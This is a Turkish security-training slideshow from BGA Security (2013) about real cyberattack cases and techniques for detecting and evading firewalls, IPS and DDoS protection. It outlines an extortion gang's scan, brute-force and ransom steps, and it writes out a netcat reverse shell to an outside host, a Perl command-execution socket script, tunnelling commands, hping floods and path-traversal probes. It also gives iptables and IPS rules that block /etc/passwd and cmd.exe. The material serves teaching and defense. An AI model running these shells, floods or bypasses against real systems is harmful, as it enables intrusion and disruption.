Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Gerçek Dünyadan Siber Saldırı Örnekleri

5,171 views

Published on

Gerçek Dünyadan Siber Saldırı Örnekleri - BGA Security Sunumu 2013

Published in: Internet

Gerçek Dünyadan Siber Saldırı Örnekleri

  1. 1. @BGASecurity BGA | Real World @BGASecurity Gerçek Dünyadan Siber Saldırı Örnekleri
  2. 2. @BGASecurity BGA | Real World @BGASecurity BGA Bilgi Güvenliği A.Ş BGA Security Hakkında BGA | Hakkında Siber güvenlik dünyasına yönelik, yenilikçi profesyonel çözümleri ile katkıda bulunmak amacı ile 2008 yılında kurulan BGA Bilgi Güvenliği A.Ş. stratejik siber güvenlik danışmanlığı ve güvenlik eğitimleri konularında büyük ölçekli çok sayıda kuruma hizmet vermektedir. Gerçekleştirdiği vizyoner danışmanlık projeleri ve nitelikli eğitimleri ile sektörde saygın bir yer kazanan BGA Bilgi Güvenliği, kurulduğu günden bugüne kadar alanında lider finans, enerji, telekom ve kamu kuruluşları ile 1.000'den fazla eğitim ve danışmanlık projelerine imza atmıştır. ARGE EĞİTİM MSSP PENTEST SOME / SOC SECOPS
  3. 3. @BGASecurity BGA | Real World @BGASecurity Bölüm-I Siber Dünyaya Giriş
  4. 4. @BGASecurity BGA | Real WorldGenel Terim ve Kavramlar Siber savaş(cyber warfare), siber tehditler, siber suç(cyber crime), cyber espionage, cyber intelligence, siber sabotaj(cyber sabotage), siber terörizm (Cyberterrorism), siber casusluk (Cyber spying), siber silah (cyber o weapon), sızma testleri (penetration test), siber güvenlik yarışmaları(CTF -Capture The Flag)
  5. 5. @BGASecurity BGA | Real WorldYeni Dünya Düzeni ve Siber Güvenlik
  6. 6. @BGASecurity BGA | Real WorldAmerika ve Siber Güvenlik • So cyberspace is real. And so are the risks that come with it. • In short, America's economic prosperity in the 21st century will depend on cybersecurity. • it's now clear this cyber threat is one of the most serious economic and national security challenges we face as a nation. • And finally, we will begin a national campaign to promote cybersecurity awareness
  7. 7. @BGASecurity BGA | Real WorldSiber Güvenlik Açısından 2010-2011
  8. 8. @BGASecurity BGA | Real WorldRSA
  9. 9. @BGASecurity BGA | Real WorldRSA Detay
  10. 10. @BGASecurity BGA | Real WorldSertifika Otoriteleri Diginotar ekran görüntüsü…
  11. 11. @BGASecurity BGA | Real WorldSONY
  12. 12. @BGASecurity BGA | Real WorldLULZSEC Arkasında kimler var? Ticari bir operasyon mu politik bir operasyon mu? Bağımsız özgürlük savaşçıları?
  13. 13. @BGASecurity BGA | Real WorldANONYMOUS
  14. 14. @BGASecurity BGA | Real WorldSTUXNET & DUQU
  15. 15. @BGASecurity BGA | Real WorldSiber Suçlar ve Uyuşturucu Kaçakcılığı ABARTI MI? GERÇEK Mİ?
  16. 16. @BGASecurity BGA | Real WorldSiber Suçlardan İlk İstifa
  17. 17. @BGASecurity BGA | Real WorldSiber Soygun… Suç şebekeleri siber dünyaya merak mı salıyor?
  18. 18. @BGASecurity BGA | Real WorldTürkiye’de Durum…
  19. 19. @BGASecurity BGA | Real WorldSiber Şantaj
  20. 20. @BGASecurity BGA | Real WorldAdım Adım Şantaj Çetesi İşlemleri Türkiye IP blokları internet üzerinden bulunur.
  21. 21. @BGASecurity BGA | Real WorldBelirli Portlarda Güvenlik Açıklığı Aranır Özellikle Windows sistemlerin 445. portu internete açıksa MS08-067 (Conficker ) açıklığı aranır.
  22. 22. @BGASecurity BGA | Real WorldAdım Adım Şantaj Çetesi İşlemleri-II Nmap gibi bir port tarma programına TCP/445, 3389, (bilimum uzaktan yönetim portu) parametre olarak verilir.
  23. 23. @BGASecurity BGA | Real WorldAdım Adım Şantaj Çetesi İşlemleri • Açık portlar belirlendikten sonra bu portlara yönelik brute force çalışması başlatılır. • Brute force çalışması için Ø Medusa Ø Hydra, Ø Brutus, Ø Metasploit kullanılabilir. • Brute force çalışması yerine doğrudan sözlük saldırıları gerçekleştirmek süreyi kısaltacaktır. Ø Uygun sözlük dosyası nerden bulunabilir?
  24. 24. @BGASecurity BGA | Real WorldAdım Adım Şantaj Çetesi İşlemleri Ncrack kullanarak RDP brute force denemeleri
  25. 25. @BGASecurity BGA | Real WorldAdım Adım Şantaj Çetesi İşlemleri • Basit parola kullanan sistemler belirlenerek sistemlere sızılır • Sistemde veritabanı varsa veritabanı dump edilerek önemli veriler şifrelenerek saklanır. • Şifreleme için Truecrypt kullanılır ve parolası 30 karekter olarak belirlenir. • Şirket sahibine e-posta gönderilerek fidye istenirJ
  26. 26. @BGASecurity BGA | Real WorldSiber Hayat • Siber tanımı: Altyapısı bilişim sistemleri olan ve gerçek hayatın gölgesi niteliğindeki yaşam. • Alışveriş, oyun, film, müzik, ticaret, yemek, komşuluk, istihbarı bilgi toplama vs gibi gerçek hayatın vazgeçilmez işleri siber hayatta da benzeri isimlerle yer almaktadır. • Halk içinde sanal dünya olarak da bilinir. • Tüm ülke/firmalar daha fazla insan hakkında bilgi toplama ve arşivlemenin peşinde Ø Ticari amaçlar Ø Sosyal araştırmalar Ø Google, Facebook, Microsoft vs…
  27. 27. @BGASecurity BGA | Real WorldSiber Dünya-Gerçek Dünya • Alışveriş (Online market) • Mektup (E-posta) • Televizyon (IPTV) • Müzik (fizy.org) • Video (Youtube) • Arkadaşlık, komşuluk (Facebook) • Telefon (MSN) • Okuma/yazma (Google Docs)
  28. 28. @BGASecurity BGA | Real WorldSiber Güvenlik • Siber hayatın güvenliği (gizlilik, bütünlük ve erişilebilirlik) sağlanması amacıyla gerçekleştirilen faaliyetlerin tümü. • Bilgi güvenliğinden farkı: daha soyut ve geniş bir alanı kapsaması Ø Bilgi güvenliği teknik, siber güvenlik sosyal bir tanımdır. • ~2015’li yıllarda en sık kullanılacak tanımlardan.
  29. 29. @BGASecurity BGA | Real WorldSiber Güvenlik Gerçek Dünyayı Nasıl Etkiler? • Wikileaks... Ø Ortadoğuda devlet başkanlarının son durumu • Türkiye’de kaset mevzuları Ø Siber dünyanın sağladığı sınırsız özgürlük(?) sayesinde kişilerin özel yaşam kavramı kalmayacaktır • 22 Ağustos’da Türkiye internetinde gerçekleştirilecek kısıtlamalar Ø Artık tüm internet kullanıcıları belirli profil seçerek internete bağlanacak ve izlenebilecek!
  30. 30. @BGASecurity BGA | Real WorldGüncel Durum • Siber hayat kavramının yerleşmesi. • Siber güvenlik, siber savaş, siber ordu tanımlarının konuşulmaya başlanması. • Yerli güvenlik yazılımlarının geliştirilmeye başlanması(yerli üretim %0,1 seviyelerinde) • Temel eksiklik: bilgi güvenliği farkındalığı, teknik konularda çalışanların temel bilgi eksikliği. • Siber güvenliğin lüks değil, gereksinim olduğu fikrinin yaygınlaşması. • Siber Güvenlik Derneği kurulumu.(2011)
  31. 31. @BGASecurity BGA | Real WorldSiber Tehditler • Bilgi güvenliğini ihlal edecek tüm faaliyetler Ø DDoS saldırıları: internet üzerinden sistemlerin erişilebilir olmasını engelleme Ø Hacking aktiviteleri ü Bilgi sızdırma faaliyetleri v RSA v Sony PS ağı üyelerinin bilgilerinin sızması ü Prestij zarar verme faaliyetleri
  32. 32. @BGASecurity BGA | Real WorldSiber Savaş • Bilişim sistemleri kullanılarak gerçekleştirilen ve amacı bir şirkete, bir ülkeye veya bir gruba yönelik maddi, manevi zararlar verme olan faaliyetler. • 2007 Estonya örneği: Ø DDoS saldırılarıyla ülkenin internet sisteminin işlemez hale getirilmesi • 2010 Türkiye örneği: Ø Yotube yasağını protesto eden bir grup Hacker Ø Çeşitli bakanlık sitelerine yönelik DDoS saldırıları gerçekleştirdi. • 2011 Türkiye örneği: Ø Anonymous grubunun 22 Ağustos’u protesto eden saldırıları Ø Etkilenen kurumlar?
  33. 33. @BGASecurity BGA | Real WorldSiber Savaş Tarafları • Hacker grupları • Ticari markalar, ticari firmalar • Devletler • Muhalif gruplar
  34. 34. @BGASecurity BGA | Real WorldSiber Ordu • Ülkeyi, kurumu siber dünyadan gelebilecek tehlikelere karşı koruyacak ve gerektiğinde siber saldırılar gerçekleştirebilecek yetenekteki bilgi güvenliği uzmanlarının • Siber ordu mensubu tüm askerler hem saldırı hem de koruma yöntemlerini çok iyi bilmek zorundadırlar . • İki tür siber ordu bulunmaktadır: Ø Devlet eliyle yetiştirilen resmi birimler Ø Gönüllü fakat resmi ayağı olmayan birimler
  35. 35. @BGASecurity BGA | Real WorldDünyadaki Siber Ordular • İlk siber ordu Amerika Birleşik Devletleri tarafından gizli olarak kurulmuştur. • Bu konuda en önemli yatırımlardan biri K.Kore’dir. • Türkiye’de henüz “bilinen” düzenli bir siber ordu yoktur. • Bazı ülkelerde “gönüllü”, siber ordular bulunmaktadır. • 2010 yılında birçok ülke siber ordu konusunu gündemine almıştır.
  36. 36. @BGASecurity BGA | Real WorldSiber Casusluk/Cyber Spying • Çeşitli hacking yöntemleri kullanılarak hedef şirket/kurum/devletten bilgi sızdırmak Ø Özellikle istihbarat teşkilatlarının sık başvurduğu yöntemlerden biridir. Ø İstihbarat teşkilatları güvenlik sistemlerine yakalanmayacak malware, virüs geliştirme konusunda ciddi yatırımlar gerçekleştirmektedir. Ø Bunun en iyi örneği İran’da yaşanan Stuxnet adı verilen ve doğrudan SCADA sistemlere yönelik aksiyon alan kötücül yazılımdır.
  37. 37. @BGASecurity BGA | Real WorldSiber Casus • Siber casuslar siber ordu elemanlarıdır • En az 3 yıl süren özel eğitimlerden geçirilerek bilgi güvenliğine ait tüm konuları bilen ve 3 konuda ileri seviye uzman olan kişilere verilen lakaptır. • Bu kişilerin görevleri bilişim sistemlerini kullanarak bilgi sızdırmaktır. • Görevleri genellikle teknoloji şirketlerinde “bilgisayarla ilgili herhangi bir alandır”
  38. 38. @BGASecurity BGA | Real WorldSiber Silah/Cyber Weapon • Klasik dünyadaki silah kavramından farklı olarak siber silah sadece yoketme amacı taşımamaktadır. Yeri geldiğinde yoketme, yeri geldiğinde iz silme ve yeri geldiğinde hedef sistemlerden bilgi kaçırma amaçlı kullanılacak yöntem ve araçlardır. • Stuxnet en güncel ve ideal siber silah örneğidir.
  39. 39. @BGASecurity BGA | Real WorldÜlkelerin Siber Güvenlik Stratejileri • Siber güvenlik konusunda alınacak stratehjiler doğrudan o ülkenin gelişmişliğiyle alakalıdır • Siber güvenlik demek teknolojiden daha fazla faydalanılıyor demek ve daha fazla korunma ihtiyacı duyuluyor demektir. • 2008-2011 yılları arasında çoğu gelişmiş ülke siber güvenlik stratejilerini açıklamış ve yürürlüğe koymuştur. • Türkiye’de henüz kabul edilen bir siber güvenlik stratejisi yoktur Ø Kırmızı kitaba eklenen üç satır hariçJ
  40. 40. @BGASecurity BGA | Real WorldÜlkelerin Siber Güvenlik Stratejileri-II • Canada Cyber Security Strategy Ø http://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdf • ESTONIA Cyber Security Strategy Ø http://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdf • Cyber Security Strategy for Germany Ø http://www.bmi.bund.de/SharedDocs/Downloads/DE/Themen/OED_Verwaltung/Informationsgesellschaft/cyber_eng.pdf?__blob=publicationFil e
  41. 41. @BGASecurity BGA | Real WorldÜlkelerin Siber Güvenlik Stratejileri-III • Cyber Security Strategy of the United Kingdom Ø http://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdf • Australian Government Cyber SeCurity Strategy Ø http://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+- +for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdf
  42. 42. @BGASecurity BGA | Real WorldSiber Saldırı Sebep ve Amaçları • Temel siber saldırı sebepleri ü Siyasi ve politik sebepler ü Rekabet ü Can sıkıntısı! ü Medyatik olma dürtüsü • Amaçlar ü Ticari gelir ü Düşünce özgürlüğüne destek ü …
  43. 43. @BGASecurity BGA | Real WorldSiber Saldırılar • İki türlüdür: Ø Bilginin gizliliğini ihlal etme amaçlı saldırılar Ø Bilgiye erişimi aksatma amaçlı saldırılar • Gizlilik ihali Ø RSA, SONY örnekleri • Erişim aksatma Ø Anonymous saldırıları(Türkiye, Malezya, Paypal, Mastercard)
  44. 44. @BGASecurity BGA | Real WorldSiber Tehditlere Karşı Yaşam Siber tehditler karşısında ne yapmalıyız?
  45. 45. @BGASecurity BGA | Real WorldSiber Savunma Sistemleri • Siber savunma artık ciddi gelir getiren bir sektör haline gelmiştir. • Sektörün devam etmesi için risk seviyesinin artması, ve medyada sık sık yer bulması gerekir. • Siber savunma sistemleri: Ø Saldırı Tespit ve Engelleme Sistemleri Ø Web Uygulama Güvenlik Duvarı Ø Antivirüs, Anti Malware … • Siber savunma sistemleri genel, bilindik saldırılar karşı koruma sağlayabilir.
  46. 46. @BGASecurity BGA | Real WorldSiber Savunma Olarak Ürün Kullanımı • Hacklenen tüm büyük firmalar dünyanın en pahalı güvenlik ürünlerini kullanıyorlar! • Ürünler sizi güvenlik risklerine karşı korumaz Ø Sihirbaz olmadıklarını anladığımızda koruma süreci başlayacaktır! • Ürünler dünya üzerindeki genele yönelik saldırılara karşı geliştirilmiştir. Ø Size özel bir saldırıda size özel yapılandırılmamış bir sistem yetersiz kalacaktır. • Ürüne yapılan yatırımın en az 1/10’u onu yönetecek güvenlik yöneticisine yapılmalı.
  47. 47. @BGASecurity BGA | Real WorldGüvenlik Dünyasının Gidişatı Firewall IDS/IPS WAF
  48. 48. @BGASecurity BGA | Real WorldHacker’larin Gidişatı Client inSecurity Mobile inSecurity Social Networks/Eng.
  49. 49. @BGASecurity BGA | Real WorldEn Zayıf Halka
  50. 50. @BGASecurity BGA | Real WorldHacker / Güvenlik Uzmanı • Güvenlik uzmanları prosedürel hareket ettiği için hackerlara göre bir adım geriden gelir. • Güvenlik uzmanları için koruma bir meslek, hackerlar için bu korumaları aşmak bir zevktir. • Hacker için bilgi güvenliği diye bir kavram yoktur, sadece aşılması gereken engel vardır! • Hackerların mesaisi, sayısı ve motivasyonu farklıdır... Ø Siber dünyada gece gündüz kavramları yoktur Ø 7/24 mesai yaparlar! • Örnek: Wordpress açıklığı
  51. 51. @BGASecurity BGA | Real WorldBakış Açısı
  52. 52. @BGASecurity BGA | Real World @BGASecurity Bölüm II Siber Saldırı Sistemleri ve Atlatma Yöntemleri
  53. 53. @BGASecurity BGA | Real WorldBölüm İçeriği • Klasik Güvenlik Anlayışı • Güvenlik Cihazları ve Temel Çalışma Yöntemleri Ø Firewall/IPS/Content Filtering • Güvenlik duvarı atlatma yöntemleri(ACL bypass) • IPS keşif ve atlatma yöntemleri • DDoS keşif ve atlatma teknikleri • Protokol tünelleme yöntemleri
  54. 54. @BGASecurity BGA | Real WorldKlasik Güvenlik Anlayışı • Tümden savunma! • Ürün temelli bir güvenlik anlayışı. Ø Ürün= sihirbaz bakış açısı(bilgi-sayar) • Türkiye’ye özel değil tüm dünya için geçerli. • Teknik sorunlar teknik yollarla çözülür, insani sorunlar insanla çözülür. • Temel bilgi sahibi olmadan ileri seviye işler yapmaya çalışma. Ø TCP/IP bilmeden Firewall/IPS yönetmek Ø İngilizce bilmeden şarkı söylemeye çalışmak!
  55. 55. @BGASecurity BGA | Real WorldGüvenlik Sistemleri • Günümüz sınır güvenliği sistemleri Ø Router Ø Güvenlik Duvarı(Firewall) Ø Saldırı Tespit ve Engelleme Sistemi(IDS/IPS) Ø Web Uygulama Güvenlik Duvarı(WAF) Ø DDoS Engelleme Sistemi Ø Veri Sızma Engelleme(DLP) Ø ...
  56. 56. @BGASecurity BGA | Real WorldFirewall Çalışma Mantığı • Ağlar arası erişim kontrolü amacıyla kullanılır. • Port ve IP bazlı çalışır Ø 192.168.1.2 ANY TCP Port 80 Ø 192.168.9.0/24 ANY UDP 53 • İçeriği denetleyemez(?) • Bazı Firewalllar L7(içeriği göre de engelleme yapabilir) • Bazı Firewalllar MAC adresine göre filtreleme yapabilir • Hesap bilgilerine göre filtreleme özelliği –Active Directory, LDAP
  57. 57. @BGASecurity BGA | Real WorldGüvenlik Duvarları Nasıl Engelleme Yapar? • Güvenlik Duvarları genelde iki tip engelleme yöntemi kullanır Ø DROP Ø REJECT • DROP: Gelen/giden paketi engelle ve geriye herhangi bir mesaj dönme • REJECT:Gelen/giden paketi engelle ve geriye TCP RST/UDP Port ulaşılamaz gibi bir mesaj dön
  58. 58. @BGASecurity BGA | Real WorldGüvenlik Duvarı Engelleme Politikası Silent Drop Kaynağa RST vs paketi dönülmez Kaynağa RST paketi dönülür
  59. 59. @BGASecurity BGA | Real WorldGüvenlik Duvarı Keşif Çalışmaları • TCP RFC’e göre bir porta SYN bayraklı paket gönderildiğinde Ø ACK-SYN döner Ø RST döner Ø Cevap dönmezse? • Herhangi üç porta gönderilecek TCP paketleriyle Firewall var/yok anlaşılabilir. • Çeşitli TCP portlara yönelik tcptraceroute çalışmaları • #nmap firewall_ip adresi
  60. 60. @BGASecurity BGA | Real WorldFirewall İle Korunan Sistem Yanlış Yapılandırma(?)
  61. 61. @BGASecurity BGA | Real WorldFirewall İle Korunmayan Sistem
  62. 62. @BGASecurity BGA | Real WorldTTL Değerlerinden Firewall Keşfi • IP başlığındaki TTL değeri bir paketin yaşam süresini belirler. • Bir paket L3 routing işlemi yapan bir cihaza rastgeldiğinde TTL değeri bir düşürülür. • Farklı sistemler farklı TTL değerlerine sahip olabilir. • Mesela Linux sistemler paket oluştururken TTL değerini 64 yaparak gönderir • Microsoft Windows ise 128 değerini kullanır.
  63. 63. @BGASecurity BGA | Real WorldTTL Üzerinden Firewall Keşfi root@seclabs:~# hping -p 80 -S 65.55.21.250 -c 1 HPING 65.55.21.250 (eth0 65.55.21.250): S set, 40 headers + 0 data bytes len=46 ip=65.55.21.250 ttl=48 id=6920 sport=80 flags=SA seq=0 win=512 rtt=152.0 ms — 65.55.21.250 hping statistic — 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 152.0/152.0/152.0 ms root@seclabs:~# hping -p 80 -F 65.55.21.250 -c 1 HPING 65.55.21.250 (eth0 65.55.21.250): F set, 40 headers + 0 data bytes len=46 ip=65.55.21.250 ttl=239 DF id=23184 sport=80 flags=RA seq=0 win=8201 rtt=249.9 ms — 65.55.21.250 hping statistic — 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 249.9/249.9/249.9 ms 65.55.21.250=microsoft.com
  64. 64. @BGASecurity BGA | Real WorldGüvenlik Duvarları Nasıl Aşılır? • Güvenlik duvarları paketlerin içeriğine bakmaz(L7 firewallar hariç) • Tünelleme yöntemleriyle güvenlik duvarları rahatlıkla aşılabilir. • Bir port, bir protokol açıksa tüm portlar ve protokoller açıktır ilkesi! • Internetten indirilecek kurulum gerektirmeyen basit araçlar kullanılarak tüm Firewall’lar aşılabilir(?) • Çalışanların %25’i Güvenlik duvarlarını aşarak işlem yapmaktadır.
  65. 65. @BGASecurity BGA | Real WorldGüvenlik Duvarı Atlatma Teknikleri • Bilinen yöntemler Ø IP Değiştirme Ø MAC değiştirme Ø ARP Spoofing Ø Tünelleme vSSH tünelleme vMSN Tünelleme vICMP Tünelleme vDNS Tünelleme
  66. 66. @BGASecurity BGA | Real WorldMac Adresine Göre Yetkilendirme • Mac adresine göre yetkilendirme yapan sistemler Ø Wireless Access Point • Firewall kuralları Ø Mac adres filtreleme destekli Firewall: Linux ebtables
  67. 67. @BGASecurity BGA | Real WorldMac Adress Spoofing • Mac adresleri kolaylıkla değiştirilebilir • “Kablosuz ağlarda MAC adresleri saklanamaz” Ø Ağa dahil birisinin mac adresi her durumda gözükecektir. • macchanger, ifconfig , Windows • Port Taramalarında şaşırtma için MAC adresi değiştirilebilir. Ø Yerel ağlarda & nmap mac spoofing
  68. 68. @BGASecurity BGA | Real WorldLinux Mac adresi değiştirme • #ifconfig eth0 down • #ifconfig eth0 hw ether 00:11:22:33:44:55 • #ifconfig eth0 up
  69. 69. @BGASecurity BGA | Real WorldWindows MAC Değişimi Registry ya da Interface Özelliklerinden
  70. 70. @BGASecurity BGA | Real WorldIP Adresine Göre Yetkilendirme • Captive Portal(Wifi) • Firewall(Güvenlik Duvarı)
  71. 71. @BGASecurity BGA | Real WorldIp Spoofing • Bir ağda aynı adrese sahip iki IP olamaz. Ø Olursa ne olur? • IP Adresi değiştirmek kolaydır. Ø İfconfig eth0 1.1.1.2 • Yerel ağlarda tehlikeli • Internet üzerinde pratikte imkansız gibi • DDOs saldırıları için sık kullanılır • UDP için işe yarar, TCP için çok zor.
  72. 72. @BGASecurity BGA | Real WorldIp Spoof • Nmap, Hping ile spoofed iplerle tarama • Hping ile spoofed paketler Ø -a • Nmap ile spoofed paketlerle port tarama Ø Sadece yerel ağlarda işe yarar
  73. 73. @BGASecurity BGA | Real WorldFirewall Atlatma:SSH Tünelleme • Genelikle güvenlik duvarlarında kullanıcılara 80/443. portlara erişime hak verilmiştir. • Internette 443. porttan SSH çalıştıran çeşitli ücretsiz SSH servisi veren sistemler bulunmaktadır. • SSH Socks proxy desteğine sahiptir. • #ssh –D hedef.sistem.com –p 443 –l huzeyfe
  74. 74. @BGASecurity BGA | Real WorldFirewall Atlatma:SSH Tünelleme
  75. 75. @BGASecurity BGA | Real WorldFirewall Atlatma:Ultrasurf • Ultrasurf: Antisansür programı • Engellemesi en zor yazılımlardan • Kurulum gerektirmez, IP adresi engelleyerek engellenemez…
  76. 76. @BGASecurity BGA | Real WorldFirewall Atlatma:Ultrasurf-II
  77. 77. @BGASecurity BGA | Real WorldFirewall Atlatma :OpenVPN • OpenVPN: UDP ve TCP üzerinden istenilen portda çalıştırılabilen SSL VPN uygulaması • Evdeki bilgisayara OpenVPN kurup dışarı 53 UDP ve TCP/443(HTTPS) bağlantıları açılır Tüm trafik UDP/53 üzerinden akacaktır!
  78. 78. @BGASecurity BGA | Real WorldFirewall Atlatma:SSL
  79. 79. @BGASecurity BGA | Real WorldFirewall Atlatma:SSL-II
  80. 80. @BGASecurity BGA | Real WorldFirewall Atlatma:Ters Tünelleme • Teamviewer mantığı!
  81. 81. @BGASecurity BGA | Real WorldTers Tünelleme Örnekleri • ssh -NR 5000:localhost:22 huzeyfe@evbilgisayari.com –p 443 • Huzeyfe’nin ev bilgisayarının 5000. portu yereldeki SSH portuna tünellenmiş durumda • Netcat Reverse Tunnel Ø netcat -e /bin/bash www.evbilgisayarim.com 443 Ø Evbilgisayarim~#nc –l –p 443
  82. 82. @BGASecurity BGA | Real WorldPerl ile Ters Tünelleme #!/usr/bin/perl use Socket; $addr=sockaddr_in('3333',inet_aton('localhost')); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')); connect(S,$addr);select S;$|=1; while(defined($l=<S>)){print qx($l);} close(S);
  83. 83. @BGASecurity BGA | Real WorldL7 Firewall • Uygulama katmanında işlem yapar Ø Paketlerin sadece ip ve port bileşenlerine değil içeriğine de bakar Ø İçerisinde /etc/passwd geçiyorsa engelle gibi! • #iptables –A INPUT –p tcp –dport 80 –m string –algo bm –string /etc/passwd –j REJECT • gibi
  84. 84. @BGASecurity BGA | Real WorldL7 Firewall Atlatma • SSL kullanılarak L7 firewallar atlatılabilir. • Çeşitli encoding teknikleri kullanılarak L7 firewallar atlatılabilir. • Çeşitli ip parçalama teknikleri kullanılarak L7 firewallar atlatılabilir.
  85. 85. @BGASecurity BGA | Real WorldL7 Firewall Atlatma
  86. 86. @BGASecurity BGA | Real WorldIDS/IPS Çalışma Mantığı • PORT, IP ve içeriğe göre karar verir. • Firewall dan en önemli farkı paketlerdeki veri alanlarını(Payload) inceleyebilmesi. • Örnek: Ø Firewall: DST TCP Port 80 ACCEPT Ø IPS: dst tcp port 80 and http_uri = cmd.exe DROP
  87. 87. @BGASecurity BGA | Real Worldİçerik Filtreleme Sistemleri • IP ve içeriğe göre filtreleme yapabilme Ø Dns ismine göre Ø url’e göre Ø IP adresine göre Ø Heuristic • Bazı sistemler MAC adresine göre filtreleme yapabilir • Hesap bilgilerine göre filtreleme özelliği, AD, LDAP
  88. 88. @BGASecurity BGA | Real WorldSaldırı Engelleme Sistemleri(IPS) • İkinci nesil güvenlik sistemleri Ø Firewall & IDS -> IPS & WAF • Pakete ait tüm alanları(L2-L7 arası) • iceleyip karar verebilir • DROP TCP ANY 80 URICONTENT cmd.exe • Drop tcp any any -> 192.168.1.0/24 80 (content: "cgi-bin/phf"; offset: 3; depth: 22; msg: "CGI-PHF attack";) • Temelde iki farklı amaç için tercih edilir Ø İçerden dışarı yapılabilecek saldırılarda/istenmeyen trafiklerde Ø Dışardan gelebilecek saldırılarda
  89. 89. @BGASecurity BGA | Real WorldIPS Keşif Çalışması • Amaç:hedef sistem önünde aktif olarak çalışan IPS’lerin belirlenmesi • Çoğu IPS ../../etc/passwd ve ../../../cmd.exe isteklerine karşı engelleme politikasına sahiptir. • Hedef sunucuya bu tip HTTP istekleri göndererek sistem önünde IPS var mı yok mu anlaşılabilir • http://blog.lifeoverip.net/2010/02/15/penetrasyon-testlerinde-ips-kesfi/
  90. 90. @BGASecurity BGA | Real WorldIPS Keşif Çalışması • Bilinen tüm IPS’lerde default olarak gelen imzalar denenerek aktif bir IPS var mı yok mu anlaşılabilir • %99 açık olan ve IPS’i tetikleyecek imzalar Ø Cmd.exe Ø ../../ Ø /etc/passwd • HTTP isteklerinde bu değerler gönderilerek dönen cevap incelenir Ø Klasik 404 vs gibi HTTP cevabı dönüyorsa IPS yok(ya da imzalar aktif değil) Ø Connection RST veya Timeout alınıyorsa IPS vardır. • IPS yokken ne cevap döner, varken ne cevap döner
  91. 91. @BGASecurity BGA | Real WorldIPS Atlatma Teknikleri-I • IP parçalama • Encoding • Protokole özel atlatma yöntemleri • Google –> IPS evasion …
  92. 92. @BGASecurity BGA | Real WorldIPS Atlatma Teknikleri-II • SSL üzerinden paket gönderimi
  93. 93. @BGASecurity BGA | Real WorldTürkiye’de Efektif IPS Kullanım Oranı • Nasıl gerçekleştirildi? • Nc(netcat), Nssl araçları kullanıldı • Önce HTTP üzerinden sonra HTTPS üzerinden aşağıdaki istekler gönderildi • GET ../../etc/passwd HTTP/1.0 • GET ../../cmd.exe HTTP/1.0
  94. 94. @BGASecurity BGA | Real WorldIPS/IDS Atlatma Teknikleri • İki çeşit atlatma tekniği Ø İçerden dışarı yapılan bağlantılarda Ø Dışardan içeri yapılacak saldırılarda • Şifreleme • Content Evasion Teknikleri • Tuzak Sistemler Kullanımı
  95. 95. @BGASecurity BGA | Real WorldŞifreli Bağlantılar ve IPS HTTP(Saldırı Paketi) HTTPS(Saldırı Paketi) HTTPS(Saldırı Paketi) Web Sunucu Web Sunucu
  96. 96. @BGASecurity BGA | Real WorldIPS ve HTTP
  97. 97. @BGASecurity BGA | Real WorldIPS ve HTTPS
  98. 98. @BGASecurity BGA | Real WorldIPS Şaşırtma • Tor Ağı üzerinden port tarama, paket gönderme • Nmap decoy scanning Ø Port taramayı farklı IP adreslerinden geliyormuş gibi gösterme
  99. 99. @BGASecurity BGA | Real WorldTuzak Sistemler Aracılığıyla IPS Şaşırtma • nmap decoy scanning
  100. 100. @BGASecurity BGA | Real WorldProxy Sistemler Üzerinden Port Tarama • Tor networku üzerinden port tarama • Tsocks
  101. 101. @BGASecurity BGA | Real Worldİç Kullanıcıların IPS Atlatması • Tünelleme yöntemleri Ø ICMP Tünelleme Ø DNS Protokol Tünelleme Ø HTTP In Smtp tünelleme Ø HTTP/HTTPS Tünelleme • WebTunnel
  102. 102. @BGASecurity BGA | Real WorldInternete Açılan Kanallarda HTTPS • Metasploit ile sistemi exploit ettiniz ve dışarı shell açılacak • Bu durumda IPS devreye girerek bağlantınızı kesebilir. • Dışarı açılan bağlantılarda SSL(cryptocat) kullanılırsa IPS anlamayacaktır. • Metasploit payload seçeneklerinde SSL desteği eklenmiştir.
  103. 103. @BGASecurity BGA | Real WorldMetasploit Evasion Teknikleri
  104. 104. @BGASecurity BGA | Real WorldHTTP Evasion Teknikleri Bu yöntemleri artık IPS ve WAF sistemleri kolaylıkla yakalayabilmektedir.
  105. 105. @BGASecurity BGA | Real WorldParçalanmış Paketlerle IDS Atlatma echo "0" > /proc/sys/net/ipv4/conf/all/rp_filter tcp_seg 10 ip_frag 64 tcp_chaff paws order random print
  106. 106. @BGASecurity BGA | Real WorldDDoS Engelleme Sistemleri • DOS/DDoS saldırılarını engelleme amaçlı geliştirilmiştir. • Genellikle istatistiksel veri analizine dayanır. • Karantina/Rate limiting/Threshold özelliği elzemdir! • Dikkatli ayarlanmamış bir DDoS engelleme sistemi tersine bir amaç için kullanılır Ø 2Mb ile 2Gb lik internet hattının durdurulması!
  107. 107. @BGASecurity BGA | Real WorldDDoS Sistemi Keşif Çalışması • %100 garantili keşif yöntemi değildir • Amaç rate limiting özelliğinin varlığını anlama • Hping –S –p 80 –flood 1.2.3.4 • Hping –udp –p 53 –flood 1.2.3.4 • İlgili portlara erişim sağlanamıyorsa muhtemelen bir ddos engelleme sistemi sizi karantinaya almıştır.
  108. 108. @BGASecurity BGA | Real WorldÖrnek Iptables Kuralları • iptables -A INPUT –p tcp –dport 80 -m limit --limit 50/s --limit-burst 30 –j REJECT • 10 dakikada max 10 bağlantı • #iptables -I INPUT -p tcp -s 0/0 -d $SERVER_IP --sport 513:65535 --dport 22 -m state --state NEW,ESTABLISHED -m recent --set -j ACCEPT • #iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 600 --hitcount 11 - j DROP
